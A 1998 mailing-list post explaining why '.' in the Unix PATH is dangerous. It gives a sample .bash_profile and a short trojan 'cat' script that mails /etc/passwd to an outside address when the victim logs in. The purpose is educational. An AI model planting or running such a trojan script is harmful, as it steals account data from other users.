On Sat, 29 Aug 1998, Gevaerts Frank wrote:
> If you don't have '.' in your path, you can't execute programs in the
> current directory, unless you type in a full pathname. If you have it in
> your path, and some malicious user makes a nasty script and calls it ls,
> if you try to do 'ls' in his homedirectory, you will in fact execute his
> script.
> You can avoid this by placing '.' last in your path, but as the FAQ points
> out, our evil user could then make a script 'sl', hoping you would make a
> typo in his homedirectory.
> If you don't have '.' in your path at all, but only /bin, /usr/bin ...,
> you can only execute binaries in those directories, in which normal usres
> can't (or shouldn't be able to) change anything
>
There is an even more serious possibility if a user has '.' at the start
of their path. Consider a user with . in their path, who as a login
script something like:
# .bash_profile
# Get the aliases and functions
if [ -f ~/.bashrc ]; then
. ~/.bashrc
fi
# User specific environment and startup programs
PATH=.:$PATH:$HOME/bin
ENV=$HOME/.bashrc
USERNAME=""
export USERNAME ENV PATH
cat ~/todo
Now a hacker creates a script in that user's home directory, called cat,
that does
#!/bin/bash
/bin/cat /etc/passwd | mail [EMAIL PROTECTED]
/bin/cat $*
Now the next time your user logs in, your password file gets mailed and
the hacker can carry out a dictionary attack. Not good.
--
Mike <[EMAIL PROTECTED]>
It is so stupid of modern civilisation to have given up believing in the
devil when he is the only explanation of it.
-- Ronald Knox, "Let Dons Delight"
